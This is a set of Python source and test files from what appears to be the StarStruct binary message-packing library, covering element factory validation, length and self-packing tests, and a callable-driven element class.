            a valid Enum element.  The validity of the referenced element must
            be checked after the creation of the entire message with the
            Message.validate() function.

        :param field: The field must be a tuple of the following form::

                (name, format, <optional>)

        :param mode: The mode in which to pack the information.
        :param alignment: The number of bytes to align objects with.
        :returns: An element whose fields match those passed in
        :raises TypeError: if the mode, field tuple or name is invalid
        :raises ValueError: if more than one element type claims the field
        """
        if not isinstance(mode, Mode):
            raise TypeError('invalid mode: {}'.format(mode))

        # The field parameter is a single field tuple:
        #   ('name', 'format', <optional>)
        if not isinstance(field, tuple):
            raise TypeError('invalid element: {}'.format(field))

        # The name of the element must be a non-null string or bytes
        # provided in as the first part of the field tuple
        if not field[0] or not isinstance(field[0], (str, bytes)):
            raise TypeError('invalid name: {}'.format(field[0]))

        valid_elems = []
        for elem in cls.elementtypes:
            try:
                if elem.valid(field):
                    valid_elems.append(elem)
            except (TypeError, KeyError):
                # A candidate that cannot even inspect this field tuple is
                # simply not a match; keep checking the rest.
                continue

        if len(valid_elems) > 1:
            # Ambiguous field specifications are an error, not a silent
            # first-match win.
            # BUGFIX: corrected the misspelled error message ("elemn").
            raise ValueError('More than one element was valid.\n\tField: {0}\n\tElems: {1}'.format(
                field, valid_elems))
        elif len(valid_elems) == 1:
            return valid_elems[0](field, mode, alignment)

        # If the function made it this far, the field specification is not valid
        raise TypeError('invalid field: {}'.format(field))

    @staticmethod
    def valid(field: tuple) -> bool:
        """
        Require element objects to implement this abstract function.

        Validation function to determine if a field tuple represents a valid
        element type.
        The basics have already been validated by the Element factory class,
        validate that the struct format is a valid numeric value.

        :param field: The format specifier for an element
        :returns: Whether this field tuple is valid for this class.
        """
        raise NotImplementedError

    def validate(self, msg: dict) -> bool:
        """
        Require element objects to implement this function.

        :param msg: The current values passed in to the element
        :returns: Whether this message represents a valid element.
        """
        raise NotImplementedError

    def update(self, mode: Mode, alignment: int) -> None:
        """
        Require element objects to implement this function.

        :param mode: The new mode for the Element
        :param alignment: The new alignment for the element
        """
        raise NotImplementedError

    def pack(self, msg: dict) -> bytes:
        """
        Require element objects to implement this function.

        :param msg: The values to pack into bytes
        :returns: The msg packed into bytes as specified by the format
        """
        raise NotImplementedError

    def unpack(self, msg: dict, buf: bytes) -> Tuple[dict, bytes]:
        """
        Require element objects to implement this function.

        :param msg: The values unpacked thus far from the bytes
        :param buf: The remaining bytes to unpack
        :returns: The updated message and the remaining bytes
        """
        raise NotImplementedError

    def make(self, msg: dict):
        """
        Require element objects to implement this function.

        :param msg: The values to place into the named tuple object
        :todo: How do I specify the correct type for this?
        """
        raise NotImplementedError
|
sprout42/StarStruct | starstruct/tests/test_selfpack.py | <reponame>sprout42/StarStruct
#!/usr/bin/env python3
"""Tests for the starstruct class and its self packing"""
import struct
import unittest
from starstruct.message import Message
class TestStarStruct(unittest.TestCase):
    """Test class for self packing of messages.

    "Self packing" means calling pack() directly on a made (namedtuple-like)
    instance rather than on the Message and a data dict.
    """

    # Field list shared by the self-pack tests: one signed byte and one
    # unsigned short, separated by explicit pad bytes.
    teststruct = [
        ('a', 'b'),  # signed byte: -128, 127
        ('pad1', '3x'),  # 3 pad bytes
        ('b', 'H'),  # unsigned short: 0, 65535
        ('pad2', 'x'),  # 1 pad byte
    ]

    # Boundary values for the fields above (min and max of each type).
    testvalues = [
        {
            'a': -128,
            'b': 0,
        },
        {
            'a': 127,
            'b': 65535,
        },
    ]

    # Sub-message used as variable-length data.
    VarTest = Message('VarTest', [
        ('x', 'B'),
        ('y', 'B'),
    ])

    # Sub-message repeated a fixed number of times.
    Repeated = Message('Repeated', [
        ('x', 'B'),
        ('z', 'H'),
    ])

    def test_self_pack(self):
        """A made instance's pack() must match Message.pack() on the same data."""
        my_message = Message('MyMessage', self.teststruct)

        my_instance_1 = my_message.make(self.testvalues[0])
        my_instance_2 = my_message.make(self.testvalues[1])

        my_bytes_1 = my_message.pack(self.testvalues[0])
        my_bytes_2 = my_message.pack(self.testvalues[1])

        assert my_instance_1.pack() == my_bytes_1
        assert my_instance_2.pack() == my_bytes_2

        # Both the Message and its made instances expose the message name.
        assert my_message._name == 'MyMessage'
        assert my_instance_1._name == 'MyMessage'

    def test_no_data(self):
        """Empty variable-length data still packs the fixed repeated section."""
        num_repeats = 4
        TestStruct = Message('TestStruct', [
            ('length', 'H', 'vardata'),
            ('vardata', self.VarTest, 'length'),
            ('repeated_data', self.Repeated, num_repeats),
        ])

        test_data_no_data = {
            'length': 0,
            'vardata': [],
            'repeated_data': [
            ],
        }

        made = TestStruct.make(test_data_no_data)
        assert made.length == 0
        assert made.vardata == []
        assert made.repeated_data == []

        packed = TestStruct.pack(test_data_no_data)
        # NOTE(review): the expected bytes repeat a zeroed (B + H) pair
        # num_repeats times even though repeated_data is empty -- presumably
        # fixed-count repeated entries are zero-filled; confirm against
        # Message's variable-element handling.
        assert packed == struct.pack('H', 0) + (struct.pack('B', 0) + struct.pack('H', 0)) * num_repeats
        assert packed == made.pack()
|
sprout42/StarStruct | starstruct/tests/test_length.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import enum
import struct
import unittest
import pytest
from starstruct.message import Message
class MyEnum(enum.Enum):
    """Possible enum types, used as the discriminator in the tests below."""
    THIS = 0
    THAT = 1
    OTHER = 2
# Example messages used by the length tests below.
# MyNamed: 1 + 32 = 33 bytes.
MyNamed = Message('MyNamed', [
    ('type', 'B'),
    ('name', '32s'),  # fixed 32-byte string field
])

# MyOtherNamed: 1 + 2 + 30 = 33 bytes, deliberately the same length as
# MyNamed (test_comparison relies on this).
MyOtherNamed = Message('MyOtherNamed', [
    ('first', 'B'),
    ('second', 'H'),
    ('pad', '30x'),
])

# A message with a different length from the two above.
NotSameMessage = Message('WowNotEvenClose', [
    ('first_and_only', '4H')
])
# pylint: disable=no-self-use
class TestLengthHelper(unittest.TestCase):
    """Test the len() support of Message objects."""

    def test_empty_length(self):
        """A message with no fields has length zero."""
        empty_message = Message('Empty', [])

        assert len(empty_message) == 0

    def test_single_item(self):
        """A single-field message has the struct size of that field."""
        one_message = Message('One', [
            ('info', 'H'),
        ])

        assert len(one_message) == struct.calcsize('H')

    def test_comparison(self):
        """Messages with equivalent total struct sizes compare equal in len()."""
        assert len(MyNamed) == len(MyOtherNamed)
        assert len(MyNamed) != len(NotSameMessage)

    def test_bad_length_item(self):
        """len() of a discriminated (union-like) message raises AttributeError."""
        bad_message = Message('BadMessage', [
            ('type', 'B', MyEnum),
            ('data', {
                MyEnum.THIS: MyNamed,
                MyEnum.THAT: NotSameMessage,
                MyEnum.OTHER: MyOtherNamed,
            }, 'type'),
        ])

        with self.assertRaises(AttributeError):
            print(len(bad_message))

    def test_long_item(self):
        """A discriminated message whose branches share one length is measurable."""
        long_message = Message('ThisIsALongOne', [
            ('ID', 'B'),
            ('delay', 'B'),
            ('a_byte', 'B'),
            ('type', 'B', MyEnum),
            ('data', {
                MyEnum.THIS: MyNamed,
                MyEnum.THAT: MyNamed,
                MyEnum.OTHER: MyOtherNamed,
            }, 'type'),
        ])

        # Second size is from the MyNamed Enum above
        my_named_format = 'B32s'

        assert len(long_message) == struct.calcsize('BBBB' + my_named_format)

    @pytest.mark.skip(reason="don't know how to test this")
    def test_variable_length(self):
        """Placeholder: len() of a variable-length message is undefined so far."""
        dont_know_how_to_test = Message('DontKnow', [
            ('numNames', 'B', 'names'),
            ('names', MyNamed, 'numNames'),
        ])

        # Not sure how to test this one yet
        # could do some multiples thing or just let it be.
        print(len(dont_know_how_to_test))
|
sprout42/StarStruct | starstruct/elementcallable.py | <reponame>sprout42/StarStruct<gh_stars>1-10
"""
Element callable.
Call a function to validate data.
TODO: Update the format here
.. code-block:: python
from binascii import crc32
ExampleMessage = Message('VarTest', [('x', 'B'), ('y', 'B')])
CRCedMessage = Message('CRCedMessage', [
('data', ExampleMessage), # A data field that has the example message in it
('crc', 'I', crc32, ['data']), # Crc the data, and give an error if we have something unexpected
('crc', 'I', crc32, ['data'], False), # Crc the data, but don't give an error
])
Following creating this message, you have two options:
1. Specify a value. The function will be used to validate the value.
.. code-block:: python
def adder(x, y):
return x + y
AdderMessage = Message('AdderMessage', [
('item_a', 'H'),
('item_b', 'B'),
('function_data', 'I', adder, ['item_a', 'item_b']),
])
test_data = {
'item_a': 2,
'item_b': 5,
'function_data': 7,
}
made = AdderMessage.make(test_data)
assert made.item_a == 2
assert made.item_b == 5
assert made.function_data == 7
# If you specify the wrong value, you'll get a ValueError
test_data = {
'item_a': 2,
'item_b': 5,
'function_data': 33,
}
try:
made = AdderMessage.make(test_data)
except ValueError:
print('Told you so')
# Unless you specify `False` in your original item, then
# nobody will care.
2. Use the function to generate a value.
.. code-block:: python
def adder(x, y):
return x + y
AdderMessage = Message('AdderMessage', [
('item_a', 'H'),
('item_b', 'B'),
('function_data', 'I', adder, ['item_a', 'item_b']),
])
test_data = {
'item_a': 2,
'item_b': 5,
}
made = AdderMessage.make(test_data)
assert made.item_a == 2
assert made.item_b == 5
assert made.function_data == 7
"""
import copy
import struct
from typing import Optional
from starstruct.element import register, Element
from starstruct.modes import Mode
# pylint: disable=too-many-instance-attributes
@register
class ElementCallable(Element):
    """
    A StarStruct element whose value is produced and/or checked by
    user-supplied callables.

    ``field[2]`` is either a dict mapping the actions 'make', 'pack' and
    'unpack' to ``(function, *arg_names)`` tuples, or a one-item set whose
    single ``(function, *arg_names)`` tuple is used for all three actions.
    """

    # Literal argument values that are passed straight through to the
    # callable instead of being resolved as field names.
    # NOTE(review): the attribute name ("mesages") is misspelled, but it is
    # part of the class's public namespace so it is left unchanged here.
    accepted_mesages = (True, False)

    def __init__(self, field: list, mode: Optional[Mode]=Mode.Native, alignment: Optional[int]=1):
        """Initialize a StarStruct element object.

        :param field: The fields passed into the constructor of the element
        :param mode: The mode in which to pack the bytes
        :param alignment: Number of bytes to align to
        """
        # All of the type checks have already been performed by the class
        # factory
        self.name = field[0]

        # Callable elements use the normal struct packing method
        self.format = field[1]

        if isinstance(field[2], dict):
            # Separate callables (and their argument name lists) per action.
            self.ref = field[2]

            # Fallback so .get() yields (None func, [None] args) for a
            # missing action.
            default_list = [None, None]

            self._make_func = self.ref.get('make', default_list)[0]
            self._make_args = self.ref.get('make', default_list)[1:]

            self._pack_func = self.ref.get('pack', default_list)[0]
            self._pack_args = self.ref.get('pack', default_list)[1:]

            self._unpack_func = self.ref.get('unpack', default_list)[0]
            self._unpack_args = self.ref.get('unpack', default_list)[1:]
        elif isinstance(field[2], set):
            # A single instruction applies to make, pack and unpack alike.
            # copy() before pop() so the caller's set is not mutated.
            instruction = field[2].copy().pop()

            self.ref = {'all': instruction}

            self._make_func = self._pack_func = self._unpack_func = instruction[0]
            self._make_args = self._pack_args = self._unpack_args = instruction[1:]

        if len(field) == 4:
            # Optional flag: raise on a mismatched value (defaults to True).
            self._error_on_bad_result = field[3]
        else:
            self._error_on_bad_result = True

        # NOTE(review): prepare_args() indexes _elements by *string*, so
        # this list is presumably replaced with a name -> element mapping
        # elsewhere (e.g. by Message) -- confirm.
        self._elements = []

        self.update(mode, alignment)

    @property
    def _struct(self):
        # Built on each access so the current mode prefix is always applied.
        return struct.Struct(self._mode.value + self.format)

    @staticmethod
    def valid(field: tuple) -> bool:
        """
        See :py:func:`starstruct.element.Element.valid`

        :param field: The items to determine the structure of the element
        """
        required_keys = {'pack', 'unpack', 'make'}

        if len(field) >= 3 and isinstance(field[0], str) and isinstance(field[1], str):
            if isinstance(field[2], dict):
                # Dict form: only the known action keys, all tuple values.
                if set(field[2].keys()) <= required_keys and \
                        all(isinstance(val, tuple) for val in field[2].values()):
                    return True
            elif isinstance(field[2], set):
                # Set form: exactly one instruction tuple.
                return len(field[2]) == 1 and \
                    all(isinstance(val, tuple) for val in field[2])

        return False

    def validate(self, msg):
        """
        Ensure that the supplied message contains the required information for
        this element object to operate.

        Every argument name referenced by an action must be a field present
        in the message (literal True/False arguments are exempt).
        """
        for action in self.ref.values():
            for arg in action[1:]:
                if arg in ElementCallable.accepted_mesages:
                    # Literal values are passed through, not looked up.
                    continue
                elif isinstance(arg, str):
                    # Already a field name; use it as-is.
                    pass
                elif hasattr(arg, 'decode'):
                    # bytes-like argument name: decode to a field name.
                    arg = arg.decode('utf-8')
                elif hasattr(arg, 'to_bytes'):
                    # int argument: render its bytes as a field name.
                    # NOTE(review): this only works if the resulting bytes
                    # decode as UTF-8 -- confirm intended usage.
                    arg = arg.to_bytes((arg.bit_length() + 7) // 8, self._mode.to_byteorder()).decode('utf-8')

                if arg not in msg:
                    raise ValueError('Need all keys to be in the message, {0} was not found\nAction: {1} -> {2}'.format(arg, action, action[1:]))

    def update(self, mode=None, alignment=None):
        """change the mode of the struct format"""
        if mode:
            self._mode = mode

        if alignment:
            self._alignment = alignment

    def pack(self, msg):
        """Pack the provided values into the supplied buffer."""
        pack_values = self.call_func(msg, self._pack_func, self._pack_args)

        # Test if the object is iterable
        # If it isn't, then turn it into a list
        try:
            _ = (p for p in pack_values)
        except TypeError:
            pack_values = [pack_values]

        # Unpack the items for struct to allow for mutli-value
        # items to be passed in.
        return self._struct.pack(*pack_values)

    def unpack(self, msg, buf):
        """Unpack data from the supplied buffer using the initialized format."""
        ret = self._struct.unpack_from(buf)

        if isinstance(ret, (list, tuple)) and len(ret) == 1:
            # We only change it not to a list if we expected one value.
            # Otherwise, we keep it as a list, because that's what we would
            # expect (like for a 16I type of struct
            ret = ret[0]

        # Only check for errors if they haven't told us not to
        if self._error_on_bad_result:
            # Pretend we're getting a dictionary to make our item,
            # but it has no reference to `self`. This is so we check
            # for errors correctly.
            # NOTE(review): temp_dict is built but never used below --
            # looks like dead code left over from an earlier approach.
            temp_dict = copy.deepcopy(msg._asdict())
            temp_dict.pop(self.name)
            expected_value = self.call_func(msg, self._unpack_func, self._unpack_args)

            # Check for an error
            if expected_value != ret:
                raise ValueError('Expected value was: {0}, but got: {1}'.format(
                    expected_value,
                    ret,
                ))

        if self.name in self._unpack_args:
            # The callable wants to see this element's own unpacked value:
            # substitute it into the message and re-run the callable.
            msg = msg._replace(**{self.name: ret})
            ret = self.call_func(msg, self._unpack_func, self._unpack_args, original=ret)

        return (ret, buf[self._struct.size:])

    def make(self, msg):
        """Return the expected "made" value"""
        # If we aren't going to error on a bad result
        # and our name is in the message, just send the value
        # No need to do extra work.
        if not self._error_on_bad_result \
                and self.name in msg \
                and msg[self.name] is not None:
            return msg[self.name]

        ret = self.call_func(msg, self._make_func, self._make_args)

        if self.name in msg:
            # A value was supplied as well: it must agree with the callable.
            if ret != msg[self.name]:
                raise ValueError('Excepted value: {0}, but got: {1}'.format(ret, msg[self.name]))

        return ret

    def call_func(self, msg, func, args, original=None):
        # Run `func` on the resolved `args`; with no callable configured,
        # fall back to the `original` value unchanged.
        if func is None:
            return original

        items = self.prepare_args(msg, args)
        return func(*items)

    def prepare_args(self, msg, args):
        # Resolve each argument name into a concrete value by delegating to
        # the referenced element's make() (str names) or pack() (bytes
        # names).
        items = []

        if hasattr(msg, '_asdict'):
            msg = msg._asdict()

        for reference in args:
            if isinstance(reference, str):
                index = reference
                attr = 'make'
            elif isinstance(reference, bytes):
                # bytes reference: hand the callable *packed* bytes instead.
                index = reference.decode('utf-8')
                attr = 'pack'
            else:
                raise ValueError('Needed str or bytes for the reference')

            items.append(
                getattr(self._elements[index], attr)(msg)
            )

        return items
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.